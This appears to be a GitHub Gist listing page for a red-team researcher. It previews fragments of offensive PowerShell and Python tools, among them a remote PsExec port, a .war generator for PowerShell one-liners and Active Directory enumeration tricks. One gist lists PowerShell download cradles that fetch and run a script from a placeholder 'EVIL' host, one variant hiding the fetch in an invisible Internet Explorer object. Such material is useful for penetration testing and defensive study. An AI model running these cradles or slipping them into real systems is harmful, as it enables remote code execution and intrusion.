This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
# these functions all you to enumerate, add, and remove alternate data streams | |
# it can function as a bootleg replacement for Sysinternals' streams.exe | |
function Find-Streams { | |
<# | |
.SYNOPSIS | |
Enumerates all alternate data streams for a specified path. | |
If no path is provided, the current path is used. | |
Author: @harmj0y | |
License: BSD 3-Clause |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
### Keybase proof | |
I hereby claim: | |
* I am harmj0y on github. | |
* I am harmj0y (https://keybase.io/harmj0y) on keybase. | |
* I have a public key whose fingerprint is FFD5 77A3 2B3A 2B41 11F4 383A FA2F 9AA5 3110 89D3 | |
To claim this, I am signing this object: |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
Function Invoke-LockWorkStation { | |
# region define P/Invoke types dynamically | |
# stolen from PowerSploit https://github.com/mattifestation/PowerSploit/blob/master/Mayhem/Mayhem.psm1 | |
# thanks matt and chris :) | |
$DynAssembly = New-Object System.Reflection.AssemblyName('Win32') | |
$AssemblyBuilder = [AppDomain]::CurrentDomain.DefineDynamicAssembly($DynAssembly, [Reflection.Emit.AssemblyBuilderAccess]::Run) | |
$ModuleBuilder = $AssemblyBuilder.DefineDynamicModule('Win32', $False) | |
$TypeBuilder = $ModuleBuilder.DefineType('Win32.User32', 'Public, Class') | |
$DllImportConstructor = [Runtime.InteropServices.DllImportAttribute].GetConstructor(@([String])) |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
function Invoke-LockWorkStation { | |
# region define P/Invoke types dynamically | |
# stolen from PowerSploit https://github.com/mattifestation/PowerSploit/blob/master/Mayhem/Mayhem.psm1 | |
# thanks matt and chris :) | |
$DynAssembly = New-Object System.Reflection.AssemblyName('Win32') | |
$AssemblyBuilder = [AppDomain]::CurrentDomain.DefineDynamicAssembly($DynAssembly, [Reflection.Emit.AssemblyBuilderAccess]::Run) | |
$ModuleBuilder = $AssemblyBuilder.DefineDynamicModule('Win32', $False) | |
$TypeBuilder = $ModuleBuilder.DefineType('Win32.User32', 'Public, Class') | |
$DllImportConstructor = [Runtime.InteropServices.DllImportAttribute].GetConstructor(@([String])) |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
#!/usr/bin/python | |
from impacket import smbserver | |
import sys, argparse, threading, ConfigParser, time, os | |
class ThreadedSMBServer(threading.Thread): | |
""" | |
Threaded SMB server that can be spun up locally. | |
""" |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
function Invoke-PsExec { | |
<# | |
.SYNOPSIS | |
This function is a rough port of Metasploit's psexec functionality. | |
It utilizes Windows API calls to open up the service manager on | |
a remote machine, creates/run a service with an associated binary | |
path or command, and then cleans everything up. | |
Either a -Command or a custom -ServiceEXE can be specified. | |
For -Commands, a -ResultsFile can also be specified to retrieve the |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
# normal download cradle | |
IEX (New-Object Net.Webclient).downloadstring("http://EVIL/evil.ps1") | |
# PowerShell 3.0+ | |
IEX (iwr 'http://EVIL/evil.ps1') | |
# hidden IE com object | |
$ie=New-Object -comobject InternetExplorer.Application;$ie.visible=$False;$ie.navigate('http://EVIL/evil.ps1');start-sleep -s 5;$r=$ie.Document.body.innerHTML;$ie.quit();IEX $r | |
# Msxml2.XMLHTTP COM object |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
#!/usr/bin/python | |
# Code that quickly generates a deployable .war for a PowerShell one-liner | |
import zipfile | |
import StringIO | |
import sys | |
def generatePsWar(psCmd, appName): |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
function Translate-Canonical { | |
<# | |
.SYNOPSIS | |
Converts a user@fqdn to NT4 format. | |
.LINK | |
http://windowsitpro.com/active-directory/translating-active-directory-object-names-between-formats | |
#> | |
[CmdletBinding()] | |
param( | |
[String]$User |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
# NOTE: the most updated version of PowerView (http://www.harmj0y.net/blog/powershell/make-powerview-great-again/) | |
# has an updated tricks Gist at https://gist.github.com/HarmJ0y/184f9822b195c52dd50c379ed3117993 | |
# get all the groups a user is effectively a member of, 'recursing up' | |
Get-NetGroup -UserName <USER> | |
# get all the effective members of a group, 'recursing down' | |
Get-NetGroupMember -GoupName <GROUP> -Recurse | |
# get the effective set of users who can administer a server |